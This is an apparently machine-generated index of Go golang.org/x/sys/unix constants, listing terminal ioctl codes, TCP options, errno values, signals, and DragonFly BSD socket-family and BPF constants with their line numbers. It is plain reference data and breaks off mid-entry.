TAB1 = 0x400 constant TAB2 (line 1437) | TAB2 = 0x800 constant TAB3 (line 1438) | TAB3 = 0x4 constant TABDLY (line 1439) | TABDLY = 0xc04 constant TCIFLUSH (line 1440) | TCIFLUSH = 0x1 constant TCIOFF (line 1441) | TCIOFF = 0x3 constant TCIOFLUSH (line 1442) | TCIOFLUSH = 0x3 constant TCION (line 1443) | TCION = 0x4 constant TCOFLUSH (line 1444) | TCOFLUSH = 0x2 constant TCOOFF (line 1445) | TCOOFF = 0x1 constant TCOON (line 1446) | TCOON = 0x2 constant TCPOPT_CC (line 1447) | TCPOPT_CC = 0xb constant TCPOPT_CCECHO (line 1448) | TCPOPT_CCECHO = 0xd constant TCPOPT_CCNEW (line 1449) | TCPOPT_CCNEW = 0xc constant TCPOPT_EOL (line 1450) | TCPOPT_EOL = 0x0 constant TCPOPT_FASTOPEN (line 1451) | TCPOPT_FASTOPEN = 0x22 constant TCPOPT_MAXSEG (line 1452) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 1453) | TCPOPT_NOP = 0x1 constant TCPOPT_SACK (line 1454) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_HDR (line 1455) | TCPOPT_SACK_HDR = 0x1010500 constant TCPOPT_SACK_PERMITTED (line 1456) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_SACK_PERMIT_HDR (line 1457) | TCPOPT_SACK_PERMIT_HDR = 0x1010402 constant TCPOPT_SIGNATURE (line 1458) | TCPOPT_SIGNATURE = 0x13 constant TCPOPT_TIMESTAMP (line 1459) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_TSTAMP_HDR (line 1460) | TCPOPT_TSTAMP_HDR = 0x101080a constant TCPOPT_WINDOW (line 1461) | TCPOPT_WINDOW = 0x3 constant TCP_CONNECTIONTIMEOUT (line 1462) | TCP_CONNECTIONTIMEOUT = 0x20 constant TCP_CONNECTION_INFO (line 1463) | TCP_CONNECTION_INFO = 0x106 constant TCP_ENABLE_ECN (line 1464) | TCP_ENABLE_ECN = 0x104 constant TCP_FASTOPEN (line 1465) | TCP_FASTOPEN = 0x105 constant TCP_KEEPALIVE (line 1466) | TCP_KEEPALIVE = 0x10 constant TCP_KEEPCNT (line 1467) | TCP_KEEPCNT = 0x102 constant TCP_KEEPINTVL (line 1468) | TCP_KEEPINTVL = 0x101 constant TCP_MAXHLEN (line 1469) | TCP_MAXHLEN = 0x3c constant TCP_MAXOLEN (line 1470) | TCP_MAXOLEN = 0x28 constant TCP_MAXSEG (line 1471) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1472) | TCP_MAXWIN = 0xffff constant TCP_MAX_SACK (line 1473) | TCP_MAX_SACK = 0x4 constant TCP_MAX_WINSHIFT (line 1474) | TCP_MAX_WINSHIFT = 0xe constant TCP_MINMSS (line 1475) | TCP_MINMSS = 0xd8 constant TCP_MSS (line 1476) | TCP_MSS = 0x200 constant TCP_NODELAY (line 1477) | TCP_NODELAY = 0x1 constant TCP_NOOPT (line 1478) | TCP_NOOPT = 0x8 constant TCP_NOPUSH (line 1479) | TCP_NOPUSH = 0x4 constant TCP_NOTSENT_LOWAT (line 1480) | TCP_NOTSENT_LOWAT = 0x201 constant TCP_RXT_CONNDROPTIME (line 1481) | TCP_RXT_CONNDROPTIME = 0x80 constant TCP_RXT_FINDROP (line 1482) | TCP_RXT_FINDROP = 0x100 constant TCP_SENDMOREACKS (line 1483) | TCP_SENDMOREACKS = 0x103 constant TCSAFLUSH (line 1484) | TCSAFLUSH = 0x2 constant TIOCCBRK (line 1485) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1486) | TIOCCDTR = 0x20007478 constant TIOCCONS (line 1487) | TIOCCONS = 0x80047462 constant TIOCDCDTIMESTAMP (line 1488) | TIOCDCDTIMESTAMP = 0x40107458 constant TIOCDRAIN (line 1489) | TIOCDRAIN = 0x2000745e constant TIOCDSIMICROCODE (line 1490) | TIOCDSIMICROCODE = 0x20007455 constant TIOCEXCL (line 1491) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1492) | TIOCEXT = 0x80047460 constant TIOCFLUSH (line 1493) | TIOCFLUSH = 0x80047410 constant TIOCGDRAINWAIT (line 1494) | TIOCGDRAINWAIT = 0x40047456 constant TIOCGETA (line 1495) | TIOCGETA = 0x40487413 constant TIOCGETD (line 1496) | TIOCGETD = 0x4004741a constant TIOCGPGRP (line 1497) | TIOCGPGRP = 0x40047477 constant TIOCGWINSZ (line 1498) | TIOCGWINSZ = 0x40087468 constant TIOCIXOFF (line 1499) | TIOCIXOFF = 0x20007480 constant TIOCIXON (line 1500) | TIOCIXON = 0x20007481 constant TIOCMBIC (line 1501) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1502) | TIOCMBIS = 0x8004746c constant TIOCMGDTRWAIT (line 1503) | TIOCMGDTRWAIT = 0x4004745a constant TIOCMGET (line 1504) | TIOCMGET = 0x4004746a constant TIOCMODG (line 1505) | TIOCMODG = 0x40047403 constant TIOCMODS (line 1506) | TIOCMODS = 0x80047404 constant TIOCMSDTRWAIT (line 1507) | TIOCMSDTRWAIT = 0x8004745b constant TIOCMSET (line 1508) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1509) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1510) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1511) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1512) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1513) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1514) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1515) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1516) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1517) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1518) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1519) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1520) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1521) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1522) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1523) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1524) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1525) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1526) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1527) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1528) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1529) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1530) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1531) | TIOCPKT_STOP = 0x4 constant TIOCPTYGNAME (line 1532) | TIOCPTYGNAME = 0x40807453 constant TIOCPTYGRANT (line 1533) | TIOCPTYGRANT = 0x20007454 constant TIOCPTYUNLK (line 1534) | TIOCPTYUNLK = 0x20007452 constant TIOCREMOTE (line 1535) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 1536) | TIOCSBRK = 0x2000747b constant TIOCSCONS (line 1537) | TIOCSCONS = 0x20007463 constant TIOCSCTTY (line 1538) | TIOCSCTTY = 0x20007461 constant TIOCSDRAINWAIT (line 1539) | TIOCSDRAINWAIT = 0x80047457 constant TIOCSDTR (line 1540) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1541) | TIOCSETA = 0x80487414 constant TIOCSETAF (line 1542) | TIOCSETAF = 0x80487416 constant TIOCSETAW (line 1543) | TIOCSETAW = 0x80487415 constant TIOCSETD (line 1544) | TIOCSETD = 0x8004741b constant TIOCSIG (line 1545) | TIOCSIG = 0x2000745f constant TIOCSPGRP (line 1546) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1547) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1548) | TIOCSTAT = 0x20007465 constant TIOCSTI (line 1549) | TIOCSTI = 0x80017472 constant TIOCSTOP (line 1550) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 1551) | TIOCSWINSZ = 0x80087467 constant TIOCTIMESTAMP (line 1552) | TIOCTIMESTAMP = 0x40107459 constant TIOCUCNTL (line 1553) | TIOCUCNTL = 0x80047466 constant TOSTOP (line 1554) | TOSTOP = 0x400000 constant UF_APPEND (line 1555) | UF_APPEND = 0x4 constant UF_COMPRESSED (line 1556) | UF_COMPRESSED = 0x20 constant UF_DATAVAULT (line 1557) | UF_DATAVAULT = 0x80 constant UF_HIDDEN (line 1558) | UF_HIDDEN = 0x8000 constant UF_IMMUTABLE (line 1559) | UF_IMMUTABLE = 0x2 constant UF_NODUMP (line 1560) | UF_NODUMP = 0x1 constant UF_OPAQUE (line 1561) | UF_OPAQUE = 0x8 constant UF_SETTABLE (line 1562) | UF_SETTABLE = 0xffff constant UF_TRACKED (line 1563) | UF_TRACKED = 0x40 constant VDISCARD (line 1564) | VDISCARD = 0xf constant VDSUSP (line 1565) | VDSUSP = 0xb constant VEOF (line 1566) | VEOF = 0x0 constant VEOL (line 1567) | VEOL = 0x1 constant VEOL2 (line 1568) | VEOL2 = 0x2 constant VERASE (line 1569) | VERASE = 0x3 constant VINTR (line 1570) | VINTR = 0x8 constant VKILL (line 1571) | VKILL = 0x5 constant VLNEXT (line 1572) | VLNEXT = 0xe constant VMADDR_CID_ANY (line 1573) | VMADDR_CID_ANY = 0xffffffff constant VMADDR_CID_HOST (line 1574) | VMADDR_CID_HOST = 0x2 constant VMADDR_CID_HYPERVISOR (line 1575) | VMADDR_CID_HYPERVISOR = 0x0 constant VMADDR_CID_RESERVED (line 1576) | VMADDR_CID_RESERVED = 0x1 constant VMADDR_PORT_ANY (line 1577) | VMADDR_PORT_ANY = 0xffffffff constant VMIN (line 1578) | VMIN = 0x10 constant VM_LOADAVG (line 1579) | VM_LOADAVG = 0x2 constant VM_MACHFACTOR (line 1580) | VM_MACHFACTOR = 0x4 constant VM_MAXID (line 1581) | VM_MAXID = 0x6 constant VM_METER (line 1582) | VM_METER = 0x1 constant VM_SWAPUSAGE (line 1583) | VM_SWAPUSAGE = 0x5 constant VQUIT (line 1584) | VQUIT = 0x9 constant VREPRINT (line 1585) | VREPRINT = 0x6 constant VSTART (line 1586) | VSTART = 0xc constant VSTATUS (line 1587) | VSTATUS = 0x12 constant VSTOP (line 1588) | VSTOP = 0xd constant VSUSP (line 1589) | VSUSP = 0xa constant VT0 (line 1590) | VT0 = 0x0 constant VT1 (line 1591) | VT1 = 0x10000 constant VTDLY (line 1592) | VTDLY = 0x10000 constant VTIME (line 1593) | VTIME = 0x11 constant VWERASE (line 1594) | VWERASE = 0x4 constant WCONTINUED (line 1595) | WCONTINUED = 0x10 constant WCOREFLAG (line 1596) | WCOREFLAG = 0x80 constant WEXITED (line 1597) | WEXITED = 0x4 constant WNOHANG (line 1598) | WNOHANG = 0x1 constant WNOWAIT (line 1599) | WNOWAIT = 0x20 constant WORDSIZE (line 1600) | WORDSIZE = 0x40 constant WSTOPPED (line 1601) | WSTOPPED = 0x8 constant WUNTRACED (line 1602) | WUNTRACED = 0x2 constant XATTR_CREATE (line 1603) | XATTR_CREATE = 0x2 constant XATTR_NODEFAULT (line 1604) | XATTR_NODEFAULT = 0x10 constant XATTR_NOFOLLOW (line 1605) | XATTR_NOFOLLOW = 0x1 constant XATTR_NOSECURITY (line 1606) | XATTR_NOSECURITY = 0x8 constant XATTR_REPLACE (line 1607) | XATTR_REPLACE = 0x4 constant XATTR_SHOWCOMPRESSION (line 1608) | XATTR_SHOWCOMPRESSION = 0x20 constant E2BIG (line 1613) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1614) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1615) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1616) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1617) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1618) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1619) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1620) | EAUTH = syscall.Errno(0x50) constant EBADARCH (line 1621) | EBADARCH = syscall.Errno(0x56) constant EBADEXEC (line 1622) | EBADEXEC = syscall.Errno(0x55) constant EBADF (line 1623) | EBADF = syscall.Errno(0x9) constant EBADMACHO (line 1624) | EBADMACHO = syscall.Errno(0x58) constant EBADMSG (line 1625) | EBADMSG = syscall.Errno(0x5e) constant EBADRPC (line 1626) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1627) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1628) | ECANCELED = syscall.Errno(0x59) constant ECHILD (line 1629) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1630) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1631) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1632) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1633) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1634) | EDESTADDRREQ = syscall.Errno(0x27) constant EDEVERR (line 1635) | EDEVERR = syscall.Errno(0x53) constant EDOM (line 1636) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1637) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1638) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1639) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1640) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1641) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1642) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1643) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1644) | EIDRM = syscall.Errno(0x5a) constant EILSEQ (line 1645) | EILSEQ = syscall.Errno(0x5c) constant EINPROGRESS (line 1646) | EINPROGRESS = syscall.Errno(0x24) constant EINTR (line 1647) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1648) | EINVAL = syscall.Errno(0x16) constant EIO (line 1649) | EIO = syscall.Errno(0x5) constant EISCONN (line 1650) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1651) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1652) | ELAST = syscall.Errno(0x6a) constant ELOOP (line 1653) | ELOOP = syscall.Errno(0x3e) constant EMFILE (line 1654) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1655) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1656) | EMSGSIZE = syscall.Errno(0x28) constant EMULTIHOP (line 1657) | EMULTIHOP = syscall.Errno(0x5f) constant ENAMETOOLONG (line 1658) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1659) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1660) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1661) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1662) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1663) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1664) | ENOATTR = syscall.Errno(0x5d) constant ENOBUFS (line 1665) | ENOBUFS = syscall.Errno(0x37) constant ENODATA (line 1666) | ENODATA = syscall.Errno(0x60) constant ENODEV (line 1667) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1668) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1669) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1670) | ENOLCK = syscall.Errno(0x4d) constant ENOLINK (line 1671) | ENOLINK = syscall.Errno(0x61) constant ENOMEM (line 1672) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1673) | ENOMSG = syscall.Errno(0x5b) constant ENOPOLICY (line 1674) | ENOPOLICY = syscall.Errno(0x67) constant ENOPROTOOPT (line 1675) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1676) | ENOSPC = syscall.Errno(0x1c) constant ENOSR (line 1677) | ENOSR = syscall.Errno(0x62) constant ENOSTR (line 1678) | ENOSTR = syscall.Errno(0x63) constant ENOSYS (line 1679) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1680) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1681) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1682) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1683) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTRECOVERABLE (line 1684) | ENOTRECOVERABLE = syscall.Errno(0x68) constant ENOTSOCK (line 1685) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1686) | ENOTSUP = syscall.Errno(0x2d) constant ENOTTY (line 1687) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1688) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1689) | EOPNOTSUPP = syscall.Errno(0x66) constant EOVERFLOW (line 1690) | EOVERFLOW = syscall.Errno(0x54) constant EOWNERDEAD (line 1691) | EOWNERDEAD = syscall.Errno(0x69) constant EPERM (line 1692) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1693) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1694) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1695) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1696) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1697) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1698) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1699) | EPROTO = syscall.Errno(0x64) constant EPROTONOSUPPORT (line 1700) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1701) | EPROTOTYPE = syscall.Errno(0x29) constant EPWROFF (line 1702) | EPWROFF = syscall.Errno(0x52) constant EQFULL (line 1703) | EQFULL = syscall.Errno(0x6a) constant ERANGE (line 1704) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1705) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1706) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1707) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHLIBVERS (line 1708) | ESHLIBVERS = syscall.Errno(0x57) constant ESHUTDOWN (line 1709) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1710) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1711) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1712) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1713) | ESTALE = syscall.Errno(0x46) constant ETIME (line 1714) | ETIME = syscall.Errno(0x65) constant ETIMEDOUT (line 1715) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1716) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1717) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1718) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1719) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1720) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1725) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1726) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1727) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1728) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1729) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1730) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1731) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1732) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1733) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1734) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1735) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1736) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1737) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1738) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 1739) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1740) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1741) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1742) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1743) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1744) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1745) | SIGTERM = syscall.Signal(0xf) constant SIGTRAP (line 1746) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1747) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1748) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1749) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1750) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1751) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1752) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1753) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1754) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1755) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1756) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_dragonfly_amd64.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_ATM (line 15) | AF_ATM = 0x1e constant AF_BLUETOOTH (line 16) | AF_BLUETOOTH = 0x21 constant AF_CCITT (line 17) | AF_CCITT = 0xa constant AF_CHAOS (line 18) | AF_CHAOS = 0x5 constant AF_CNT (line 19) | AF_CNT = 0x15 constant AF_COIP (line 20) | AF_COIP = 0x14 constant AF_DATAKIT (line 21) | AF_DATAKIT = 0x9 constant AF_DECnet (line 22) | AF_DECnet = 0xc constant AF_DLI (line 23) | AF_DLI = 0xd constant AF_E164 (line 24) | AF_E164 = 0x1a constant AF_ECMA (line 25) | AF_ECMA = 0x8 constant AF_HYLINK (line 26) | AF_HYLINK = 0xf constant AF_IEEE80211 (line 27) | AF_IEEE80211 = 0x23 constant AF_IMPLINK (line 28) | AF_IMPLINK = 0x3 constant AF_INET (line 29) | AF_INET = 0x2 constant AF_INET6 (line 30) | AF_INET6 = 0x1c constant AF_IPX (line 31) | AF_IPX = 0x17 constant AF_ISDN (line 32) | AF_ISDN = 0x1a constant AF_ISO (line 33) | AF_ISO = 0x7 constant AF_LAT (line 34) | AF_LAT = 0xe constant AF_LINK (line 35) | AF_LINK = 0x12 constant AF_LOCAL (line 36) | AF_LOCAL = 0x1 constant AF_MAX (line 37) | AF_MAX = 0x24 constant AF_MPLS (line 38) | AF_MPLS = 0x22 constant AF_NATM (line 39) | AF_NATM = 0x1d constant AF_NETBIOS (line 40) | AF_NETBIOS = 0x6 constant AF_NETGRAPH (line 41) | AF_NETGRAPH = 0x20 constant AF_OSI (line 42) | AF_OSI = 0x7 constant AF_PUP (line 43) | AF_PUP = 0x4 constant AF_ROUTE (line 44) | AF_ROUTE = 0x11 constant AF_SIP (line 45) | AF_SIP = 0x18 constant AF_SNA (line 46) | AF_SNA = 0xb constant AF_UNIX (line 47) | AF_UNIX = 0x1 constant AF_UNSPEC (line 48) | AF_UNSPEC = 0x0 constant ALTWERASE (line 49) | ALTWERASE = 0x200 constant B0 (line 50) | B0 = 0x0 constant B110 (line 51) | B110 = 0x6e constant B115200 (line 52) | B115200 = 0x1c200 constant B1200 (line 53) | B1200 = 0x4b0 constant B134 (line 54) | B134 = 0x86 constant B14400 (line 55) | B14400 = 0x3840 constant B150 (line 56) | B150 = 0x96 constant B1800 (line 57) | B1800 = 0x708 constant B19200 (line 58) | B19200 = 0x4b00 constant B200 (line 59) | B200 = 0xc8 constant B230400 (line 60) | B230400 = 0x38400 constant B2400 (line 61) | B2400 = 0x960 constant B28800 (line 62) | B28800 = 0x7080 constant B300 (line 63) | B300 = 0x12c constant B38400 (line 64) | B38400 = 0x9600 constant B460800 (line 65) | B460800 = 0x70800 constant B4800 (line 66) | B4800 = 0x12c0 constant B50 (line 67) | B50 = 0x32 constant B57600 (line 68) | B57600 = 0xe100 constant B600 (line 69) | B600 = 0x258 constant B7200 (line 70) | B7200 = 0x1c20 constant B75 (line 71) | B75 = 0x4b constant B76800 (line 72) | B76800 = 0x12c00 constant B921600 (line 73) | B921600 = 0xe1000 constant B9600 (line 74) | B9600 = 0x2580 constant BIOCFEEDBACK (line 75) | BIOCFEEDBACK = 0x8004427d constant BIOCFLUSH (line 76) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 77) | BIOCGBLEN = 0x40044266 constant BIOCGDLT (line 78) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 79) | BIOCGDLTLIST = 0xc0104279 constant BIOCGETIF (line 80) | BIOCGETIF = 0x4020426b constant BIOCGFEEDBACK (line 81) | BIOCGFEEDBACK = 0x4004427c constant BIOCGHDRCMPLT (line 82) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 83) | BIOCGRSIG = 0x40044272 constant BIOCGRTIMEOUT (line 84) | BIOCGRTIMEOUT = 0x4010426e constant BIOCGSEESENT (line 85) | BIOCGSEESENT = 0x40044276 constant BIOCGSTATS (line 86) | BIOCGSTATS = 0x4008426f constant BIOCIMMEDIATE (line 87) | BIOCIMMEDIATE = 0x80044270 constant BIOCLOCK (line 88) | BIOCLOCK = 0x2000427a constant BIOCPROMISC (line 89) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 90) | BIOCSBLEN = 0xc0044266 constant BIOCSDLT (line 91) | BIOCSDLT = 0x80044278 constant BIOCSETF (line 92) | BIOCSETF = 0x80104267 constant BIOCSETIF (line 93) | BIOCSETIF = 0x8020426c constant BIOCSETWF (line 94) | BIOCSETWF = 0x8010427b constant BIOCSFEEDBACK (line 95) | BIOCSFEEDBACK = 0x8004427d constant BIOCSHDRCMPLT (line 96) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 97) | BIOCSRSIG = 0x80044273 constant BIOCSRTIMEOUT (line 98) | BIOCSRTIMEOUT = 0x8010426d constant BIOCSSEESENT (line 99) | BIOCSSEESENT = 0x80044277 constant BIOCVERSION (line 100) | BIOCVERSION = 0x40044271 constant BPF_A (line 101) | BPF_A = 0x10 constant BPF_ABS (line 102) | BPF_ABS = 0x20 constant BPF_ADD (line 103) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 104) | BPF_ALIGNMENT = 0x8 constant BPF_ALU (line 105) | BPF_ALU = 0x4 constant BPF_AND (line 106) | BPF_AND = 0x50 constant BPF_B (line 107) | BPF_B = 0x10 constant BPF_DEFAULTBUFSIZE (line 108) | BPF_DEFAULTBUFSIZE = 0x1000 constant BPF_DIV (line 109) | BPF_DIV = 0x30 constant BPF_H (line 110) | BPF_H = 0x8 constant BPF_IMM (line 111) | BPF_IMM = 0x0 constant BPF_IND (line 112) | BPF_IND = 0x40 constant BPF_JA (line 113) | BPF_JA = 0x0 constant BPF_JEQ (line 114) | BPF_JEQ = 0x10 constant BPF_JGE (line 115) | BPF_JGE = 0x30 constant BPF_JGT (line 116) | BPF_JGT = 0x20 constant BPF_JMP (line 117) | BPF_JMP = 0x5 constant BPF_JSET (line 118) | BPF_JSET = 0x40 constant BPF_K (line 119) | BPF_K = 0x0 constant BPF_LD (line 120) | BPF_LD = 0x0 constant BPF_LDX (line 121) | BPF_LDX = 0x1 constant BPF_LEN (line 122) | BPF_LEN = 0x80 constant BPF_LSH (line 123) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 124) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 125) | BPF_MAXBUFSIZE = 0x80000 constant BPF_MAXINSNS (line 126) | BPF_MAXINSNS = 0x200 constant BPF_MAX_CLONES (line 127) | BPF_MAX_CLONES = 0x80 constant BPF_MEM (line 128) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 129) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 130) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 131) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 132) | BPF_MISC = 0x7 constant BPF_MOD (line 133) | BPF_MOD = 0x90 constant BPF_MSH (line 134) | BPF_MSH = 0xa0 constant BPF_MUL (line 135) | BPF_MUL = 0x20 constant BPF_NEG (line 136) | BPF_NEG = 0x80 constant BPF_OR (line 137) | BPF_OR = 0x40 constant BPF_RELEASE (line 138) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 139) | BPF_RET = 0x6 constant BPF_RSH (line 140) | BPF_RSH = 0x70 constant BPF_ST (line 141) | BPF_ST = 0x2 constant BPF_STX (line 142) | BPF_STX = 0x3 constant BPF_SUB (line 143) | BPF_SUB = 0x10 constant BPF_TAX (line 144) | BPF_TAX = 0x0 constant BPF_TXA (line 145) | BPF_TXA = 0x80 constant BPF_W (line 146) | BPF_W = 0x0 constant BPF_X (line 147) | BPF_X = 0x8 constant BPF_XOR (line 148) | BPF_XOR = 0xa0 constant BRKINT (line 149) | BRKINT = 0x2 constant CFLUSH (line 150) | CFLUSH = 0xf constant CLOCAL (line 151) | CLOCAL = 0x8000 constant CLOCK_MONOTONIC (line 152) | CLOCK_MONOTONIC = 0x4 constant 